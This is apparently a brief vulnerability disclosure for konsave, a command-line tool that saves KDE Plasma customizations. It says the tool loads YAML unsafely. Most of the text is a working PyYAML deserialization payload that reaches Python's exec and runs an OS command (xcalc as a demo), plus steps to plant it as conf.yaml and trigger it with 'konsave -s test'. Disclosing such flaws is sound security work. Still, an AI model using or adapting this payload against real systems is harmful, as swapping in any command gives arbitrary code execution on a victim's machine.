konsave
is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack
caused by unsafe loading leads to Arbitary Code Execution
.
pip install konsave
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
now copy conf.yaml and paste in konsave directory
Run the command below
konsave -s test
This will create a profile along with it code execution will occur
Arbitary Code Execution